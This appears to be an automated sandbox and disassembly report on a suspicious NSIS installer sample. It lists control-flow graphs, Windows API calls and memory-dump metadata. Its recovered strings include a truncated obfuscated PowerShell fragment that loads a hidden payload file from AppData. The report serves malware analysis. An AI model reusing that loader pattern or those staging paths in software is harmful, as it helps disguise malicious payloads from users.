AppendMenuW 3026->3028 3030 4053e6 GetWindowRect 3028->3030 3031 4053f9 3028->3031 3029 405264 3032 4052a1 GetDlgItem SendMessageW 3029->3032 3033 40526d ShowWindow 3029->3033 3034 405402 TrackPopupMenu 3030->3034 3031->3034 3032->3018 3037 4052c8 SendMessageW SendMessageW 3032->3037 3035 405290 3033->3035 3036 405283 ShowWindow 3033->3036 3034->3018 3038 405420 3034->3038 3048 403fca SendMessageW 3035->3048 3036->3035 3037->3018 3039 40543c SendMessageW 3038->3039 3039->3039 3041 405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3039->3041 3042 40547e SendMessageW 3041->3042 3042->3042 3043 4054a7 GlobalUnlock SetClipboardData CloseClipboard 3042->3043 3043->3018 3044->3004 3046 405d68 18 API calls 3045->3046 3047 403fa0 SetDlgItemTextW 3046->3047 3047->3029 3048->3032 3049->3007 3051 403f75 3050->3051 3052 403f7b SendMessageW 3050->3052 3051->3052 3052->3005 3054 40409d 3053->3054 3055 404014 GetWindowLongW 3053->3055 3054->3018 3055->3054 3056 404025 3055->3056 3057 404034 GetSysColor 3056->3057 3058 404037 3056->3058 3057->3058 3059 404047 SetBkMode 3058->3059 3060 40403d SetTextColor 3058->3060 3061 404065 3059->3061 3062 40405f GetSysColor 3059->3062 3060->3059 3063 404076 3061->3063 3064 40406c SetBkColor 3061->3064 3062->3061 3063->3054 3065 404090 CreateBrushIndirect 3063->3065 3066 404089 DeleteObject 3063->3066 3064->3063 3065->3054 3066->3065 3074 403fe1 3067->3074 3069 4050f0 3073 405117 3069->3073 3077 401389 3069->3077 3070 403fe1 SendMessageW 3071 405129 CoUninitialize 3070->3071 3073->3070 3075 403ff9 3074->3075 3076 403fea SendMessageW 3074->3076 3075->3069 3076->3075 3079 401390 3077->3079 3078 4013fe 3078->3069 3079->3078 3080 4013cb MulDiv SendMessageW 3079->3080 3080->3079 4079 401939 4080 402ad0 18 API calls 4079->4080 4081 401940 lstrlenW 4080->4081 4082 4024e6 4081->4082 4082->4082 3301 403abd 3302 403c10 3301->3302 3303 403ad5 3301->3303 3305 403c21 GetDlgItem GetDlgItem 3302->3305 3306 403c61 3302->3306 3303->3302 3304 403ae1 
3303->3304 3307 403aec SetWindowPos 3304->3307 3308 403aff 3304->3308 3309 403f95 19 API calls 3305->3309 3310 403cbb 3306->3310 3315 401389 2 API calls 3306->3315 3307->3308 3312 403b04 ShowWindow 3308->3312 3313 403b1c 3308->3313 3314 403c4b SetClassLongW 3309->3314 3311 403fe1 SendMessageW 3310->3311 3316 403c0b 3310->3316 3342 403ccd 3311->3342 3312->3313 3317 403b24 DestroyWindow 3313->3317 3318 403b3e 3313->3318 3319 40140b 2 API calls 3314->3319 3320 403c93 3315->3320 3321 403f1e 3317->3321 3322 403b43 SetWindowLongW 3318->3322 3323 403b54 3318->3323 3319->3306 3320->3310 3324 403c97 SendMessageW 3320->3324 3321->3316 3332 403f4f ShowWindow 3321->3332 3322->3316 3327 403b60 GetDlgItem 3323->3327 3328 403bfd 3323->3328 3324->3316 3325 40140b 2 API calls 3325->3342 3326 403f20 DestroyWindow EndDialog 3326->3321 3329 403b90 3327->3329 3330 403b73 SendMessageW IsWindowEnabled 3327->3330 3331 403ffc 8 API calls 3328->3331 3334 403b9d 3329->3334 3335 403be4 SendMessageW 3329->3335 3336 403bb0 3329->3336 3346 403b95 3329->3346 3330->3316 3330->3329 3331->3316 3332->3316 3333 405d68 18 API calls 3333->3342 3334->3335 3334->3346 3335->3328 3339 403bb8 3336->3339 3340 403bcd 3336->3340 3337 403f6e SendMessageW 3341 403bcb 3337->3341 3338 403f95 19 API calls 3338->3342 3344 40140b 2 API calls 3339->3344 3343 40140b 2 API calls 3340->3343 3341->3328 3342->3316 3342->3325 3342->3326 3342->3333 3342->3338 3347 403f95 19 API calls 3342->3347 3362 403e60 DestroyWindow 3342->3362 3345 403bd4 3343->3345 3344->3346 3345->3328 3345->3346 3346->3337 3348 403d48 GetDlgItem 3347->3348 3349 403d65 ShowWindow KiUserCallbackDispatcher 3348->3349 3350 403d5d 3348->3350 3371 403fb7 KiUserCallbackDispatcher 3349->3371 3350->3349 3352 403d8f EnableWindow 3355 403da3 3352->3355 3353 403da8 GetSystemMenu EnableMenuItem SendMessageW 3354 403dd8 SendMessageW 3353->3354 3353->3355 3354->3355 3355->3353 3372 403fca SendMessageW 3355->3372 3373 405d46 lstrcpynW 3355->3373 3358 403e06 lstrlenW 
3359 405d68 18 API calls 3358->3359 3360 403e1c SetWindowTextW 3359->3360 3361 401389 2 API calls 3360->3361 3361->3342 3362->3321 3363 403e7a CreateDialogParamW 3362->3363 3363->3321 3364 403ead 3363->3364 3365 403f95 19 API calls 3364->3365 3366 403eb8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3365->3366 3367 401389 2 API calls 3366->3367 3368 403efe 3367->3368 3368->3316 3369 403f06 ShowWindow 3368->3369 3370 403fe1 SendMessageW 3369->3370 3370->3321 3371->3352 3372->3355 3373->3358 3390 40173f 3391 402ad0 18 API calls 3390->3391 3392 401746 3391->3392 3393 4059fe 2 API calls 3392->3393 3394 40174d 3393->3394 3395 4059fe 2 API calls 3394->3395 3395->3394 4083 4026bf 4084 4026c6 4083->4084 4085 40295d 4083->4085 4086 4026cc FindClose 4084->4086 4086->4085

                                                            Control-flow Graph

                                                            control_flow_graph 0 4031dd-403273 #17 SetErrorMode OleInitialize call 4060b0 SHGetFileInfoW call 405d46 GetCommandLineW call 405d46 GetModuleHandleW 7 403275-40327c 0->7 8 40327d-40328f call 4057db CharNextW 0->8 7->8 11 403358-40335e 8->11 12 403294-40329a 11->12 13 403364 11->13 14 4032a3-4032a9 12->14 15 40329c-4032a1 12->15 16 403378-403392 GetTempPathW call 4031a9 13->16 17 4032b0-4032b4 14->17 18 4032ab-4032af 14->18 15->14 15->15 26 403394-4033b2 GetWindowsDirectoryW lstrcatW call 4031a9 16->26 27 4033ea-403404 DeleteFileW call 402cff 16->27 20 403349-403354 call 4057db 17->20 21 4032ba-4032c0 17->21 18->17 20->11 35 403356-403357 20->35 24 4032c2-4032c9 21->24 25 4032d5-4032ec 21->25 30 4032d0 24->30 31 4032cb-4032ce 24->31 32 40331a-403330 25->32 33 4032ee-403304 25->33 26->27 44 4033b4-4033e4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4031a9 26->44 40 40349a-4034a9 call 403640 OleUninitialize 27->40 41 40340a-403410 27->41 30->25 31->25 31->30 32->20 39 403332-403347 32->39 33->32 37 403306-40330e 33->37 35->11 42 403310-403313 37->42 43 403315 37->43 39->20 45 403366-403373 call 405d46 39->45 57 4035a5-4035ab 40->57 58 4034af-4034bf call 405529 ExitProcess 40->58 46 403412-40341d call 4057db 41->46 47 40348a-403491 call 40371a 41->47 42->32 42->43 43->32 44->27 44->40 45->16 61 403454-40345e 46->61 62 40341f-403430 46->62 56 403496 47->56 56->40 59 403628-403630 57->59 60 4035ad-4035ca call 4060b0 * 3 57->60 66 403632 59->66 67 403636-40363a ExitProcess 59->67 92 403614-40361f ExitWindowsEx 60->92 93 4035cc-4035ce 60->93 68 403460-40346e call 4058b6 61->68 69 4034c5-4034df lstrcatW lstrcmpiW 61->69 65 403432-403434 62->65 72 403436-40344c 65->72 73 40344e-403452 65->73 66->67 68->40 83 403470-403486 call 405d46 * 2 68->83 69->40 75 4034e1-4034f7 CreateDirectoryW SetCurrentDirectoryW 69->75 72->61 72->73 73->61 73->65 78 403504-40352d call 405d46 75->78 79 4034f9-4034ff call 405d46 
75->79 88 403532-40354e call 405d68 DeleteFileW 78->88 79->78 83->47 98 403550-403560 CopyFileW 88->98 99 40358f-403597 88->99 92->59 96 403621-403623 call 40140b 92->96 93->92 97 4035d0-4035d2 93->97 96->59 97->92 101 4035d4-4035e6 GetCurrentProcess 97->101 98->99 103 403562-403582 call 405be0 call 405d68 call 4054c8 98->103 99->88 102 403599-4035a0 call 405be0 99->102 101->92 107 4035e8-40360a 101->107 102->40 103->99 115 403584-40358b CloseHandle 103->115 107->92 115->99
                                                            APIs
                                                            • #17.COMCTL32 ref: 004031FC
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403207
                                                            • OleInitialize.OLE32(00000000), ref: 0040320E
                                                              • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                              • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                              • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                            • SHGetFileInfoW.SHELL32(0042B1B8,00000000,?,000002B4,00000000), ref: 00403236
                                                              • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                            • GetCommandLineW.KERNEL32(00433EA0,NSIS Error), ref: 0040324B
                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",00000000), ref: 0040325E
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",00000020), ref: 00403285
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403389
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040339A
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033A6
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033BA
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033C2
                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033D3
                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                            • DeleteFileW.KERNELBASE(1033), ref: 004033EF
                                                            • OleUninitialize.OLE32(?), ref: 0040349F
                                                            • ExitProcess.KERNEL32 ref: 004034BF
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\YrCSUX2O3I.exe",00000000,?), ref: 004034CB
                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\YrCSUX2O3I.exe",00000000,?), ref: 004034D7
                                                            • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034E3
                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004034EA
                                                            • DeleteFileW.KERNEL32(0042A9B8,0042A9B8,?,"$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286,?), ref: 00403544
                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\YrCSUX2O3I.exe,0042A9B8,00000001), ref: 00403558
                                                            • CloseHandle.KERNEL32(00000000,0042A9B8,0042A9B8,?,0042A9B8,00000000), ref: 00403585
                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 004035DB
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403617
                                                            • ExitProcess.KERNEL32 ref: 0040363A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                            • String ID: "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286$"C:\Users\user\Desktop\YrCSUX2O3I.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens$C:\Users\user\Desktop$C:\Users\user\Desktop\YrCSUX2O3I.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                            • API String ID: 4107622049-1391743483
                                                            • Opcode ID: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                            • Instruction ID: c3dce8018812ee6b76f8874dd062ed99eac1b1b1f1b1a27a2229326af738bb6a
                                                            • Opcode Fuzzy Hash: abc994cbbed28e5ab2df900e3bd2d261610db15ed8f53fee5a5c2c0b050c2c29
                                                            • Instruction Fuzzy Hash: 21B1C230500311AAD720BF619D49A2B3EACEF45746F11443FF442BA2E1DBBD9A45CB6E

                                                            Control-flow Graph

                                                            control_flow_graph 116 405139-405154 117 4052e5-4052ec 116->117 118 40515a-405223 GetDlgItem * 3 call 403fca call 404897 GetClientRect GetSystemMetrics SendMessageW * 2 116->118 119 405316-405323 117->119 120 4052ee-405310 GetDlgItem CreateThread CloseHandle 117->120 136 405241-405244 118->136 137 405225-40523f SendMessageW * 2 118->137 123 405341-405348 119->123 124 405325-40532b 119->124 120->119 128 40534a-405350 123->128 129 40539f-4053a3 123->129 126 405363-40536c call 403ffc 124->126 127 40532d-40533c ShowWindow * 2 call 403fca 124->127 140 405371-405375 126->140 127->123 133 405352-40535e call 403f6e 128->133 134 405378-405388 ShowWindow 128->134 129->126 131 4053a5-4053a8 129->131 131->126 138 4053aa-4053bd SendMessageW 131->138 133->126 141 405398-40539a call 403f6e 134->141 142 40538a-405393 call 404ffa 134->142 144 405254-40526b call 403f95 136->144 145 405246-405252 SendMessageW 136->145 137->136 146 4054c1-4054c3 138->146 147 4053c3-4053e4 CreatePopupMenu call 405d68 AppendMenuW 138->147 141->129 142->141 155 4052a1-4052c2 GetDlgItem SendMessageW 144->155 156 40526d-405281 ShowWindow 144->156 145->144 146->140 153 4053e6-4053f7 GetWindowRect 147->153 154 4053f9-4053ff 147->154 157 405402-40541a TrackPopupMenu 153->157 154->157 155->146 160 4052c8-4052e0 SendMessageW * 2 155->160 158 405290 156->158 159 405283-40528e ShowWindow 156->159 157->146 161 405420-405437 157->161 162 405296-40529c call 403fca 158->162 159->162 160->146 163 40543c-405457 SendMessageW 161->163 162->155 163->163 165 405459-40547c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 163->165 166 40547e-4054a5 SendMessageW 165->166 166->166 167 4054a7-4054bb GlobalUnlock SetClipboardData CloseClipboard 166->167 167->146
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 00405198
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004051A7
                                                            • GetClientRect.USER32(?,?), ref: 004051E4
                                                            • GetSystemMetrics.USER32(00000015), ref: 004051EC
                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 0040520D
                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040521E
                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405231
                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040523F
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405252
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405274
                                                            • ShowWindow.USER32(?,00000008), ref: 00405288
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052A9
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004052B9
                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052D2
                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052DE
                                                            • GetDlgItem.USER32(?,000003F8), ref: 004051B6
                                                              • Part of subcall function 00403FCA: SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052FB
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000050CD,00000000), ref: 00405309
                                                            • CloseHandle.KERNELBASE(00000000), ref: 00405310
                                                            • ShowWindow.USER32(00000000), ref: 00405334
                                                            • ShowWindow.USER32(?,00000008), ref: 00405339
                                                            • ShowWindow.USER32(00000008), ref: 00405380
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B2
                                                            • CreatePopupMenu.USER32 ref: 004053C3
                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053D8
                                                            • GetWindowRect.USER32(?,?), ref: 004053EB
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040540F
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040544A
                                                            • OpenClipboard.USER32(00000000), ref: 0040545A
                                                            • EmptyClipboard.USER32 ref: 00405460
                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040546C
                                                            • GlobalLock.KERNEL32(00000000), ref: 00405476
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040548A
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004054AA
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004054B5
                                                            • CloseClipboard.USER32 ref: 004054BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: {$QM
                                                            • API String ID: 590372296-1725967926
                                                            • Opcode ID: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                            • Instruction ID: 772e8fb2bc22c5523386e43e2fe12f7b772d85fac993704a731418f1505fe185
                                                            • Opcode Fuzzy Hash: 6a257b260a3b0c83269dcddb951c3defeee43ec038cce651daa15833628ad7d2
                                                            • Instruction Fuzzy Hash: A8A14871800609FFDB119F60DD89AAE7B79FF08355F00403AFA45BA1A0CBB59A51DF58

                                                            Control-flow Graph

                                                            control_flow_graph 409 405d68-405d73 410 405d75-405d84 409->410 411 405d86-405d9c 409->411 410->411 412 405da2-405daf 411->412 413 405fb4-405fba 411->413 412->413 414 405db5-405dbc 412->414 415 405fc0-405fcb 413->415 416 405dc1-405dce 413->416 414->413 418 405fd6-405fd7 415->418 419 405fcd-405fd1 call 405d46 415->419 416->415 417 405dd4-405de0 416->417 421 405fa1 417->421 422 405de6-405e22 417->422 419->418 423 405fa3-405fad 421->423 424 405faf-405fb2 421->424 425 405f42-405f46 422->425 426 405e28-405e33 GetVersion 422->426 423->413 424->413 429 405f48-405f4c 425->429 430 405f7b-405f7f 425->430 427 405e35-405e39 426->427 428 405e4d 426->428 427->428 434 405e3b-405e3f 427->434 431 405e54-405e5b 428->431 435 405f5c-405f69 call 405d46 429->435 436 405f4e-405f5a call 405c8d 429->436 432 405f81-405f89 call 405d68 430->432 433 405f8e-405f9f lstrlenW 430->433 438 405e60-405e62 431->438 439 405e5d-405e5f 431->439 432->433 433->413 434->428 442 405e41-405e45 434->442 446 405f6e-405f77 435->446 436->446 444 405e64-405e81 call 405c13 438->444 445 405e9e-405ea1 438->445 439->438 442->428 447 405e47-405e4b 442->447 452 405e86-405e8a 444->452 450 405eb1-405eb4 445->450 451 405ea3-405eaf GetSystemDirectoryW 445->451 446->433 449 405f79 446->449 447->431 453 405f3a-405f40 call 405fda 449->453 455 405eb6-405ec4 GetWindowsDirectoryW 450->455 456 405f1f-405f21 450->456 454 405f23-405f27 451->454 457 405e90-405e99 call 405d68 452->457 458 405f29-405f2d 452->458 453->433 454->453 454->458 455->456 456->454 459 405ec6-405ed0 456->459 457->454 458->453 462 405f2f-405f35 lstrcatW 458->462 464 405ed2-405ed5 459->464 465 405eea-405f00 SHGetSpecialFolderLocation 459->465 462->453 464->465 466 405ed7-405ede 464->466 467 405f02-405f19 SHGetPathFromIDListW CoTaskMemFree 465->467 468 405f1b 465->468 470 405ee6-405ee8 466->470 467->454 467->468 468->456 470->454 470->465
                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405E2B
                                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EA9
                                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405EBC
                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405EF8
                                                            • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F06
                                                            • CoTaskMemFree.OLE32(?), ref: 00405F11
                                                            • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F35
                                                            • lstrlenW.KERNEL32(: Completed,00000000,Frisurens,?,00405031,Frisurens,00000000,00000000,0041C0DD), ref: 00405F8F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                            • String ID: "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(286$: Completed$Frisurens$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 900638850-645379208
                                                            • Opcode ID: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                            • Instruction ID: b81ff5d6b4e7f68ebbf9f5a60334f295c7cfdbca171d810927ba552bda20cf23
                                                            • Opcode Fuzzy Hash: 22fe4a5b293e7964b16035e555f953c0a2e3a01ea996a2207c843cdd348733b1
                                                            • Instruction Fuzzy Hash: E761C071A00906ABDF209F25CD45AAF37A5EF55314F14803BE585BA2E0D77D8A82CF8D

                                                            Control-flow Graph (function entry 004055D5; executed / not-executed basic blocks; edge list omitted)
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 004055FE
                                                            • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 00405646
                                                            • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 00405669
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 0040566F
                                                            • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\YrCSUX2O3I.exe"), ref: 0040567F
                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,?,?,0000003F), ref: 00405733
                                                            • FindClose.KERNEL32(00000000), ref: 00405744
                                                            Strings
                                                            • "C:\Users\user\Desktop\YrCSUX2O3I.exe", xrefs: 004055DE
                                                            • \*.*, xrefs: 00405640
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\YrCSUX2O3I.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                            • API String ID: 2035342205-1418626317
                                                            • Opcode ID: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                            • Instruction ID: 4fa580f458b6ccb0767a7c3d42ea348ba32fb6fd56c90456328cf5468defc57c
                                                            • Opcode Fuzzy Hash: 47c12af7b891abb2e5cafb38bce86d44a40b8918cc5e8908534289e066a9b85e
                                                            • Instruction Fuzzy Hash: 8A51B135800A05EACB21AB218C85ABF7778EF81754F54843BF415B61D1E77C4982EE6D
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                            • LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                            Memory Dump Source
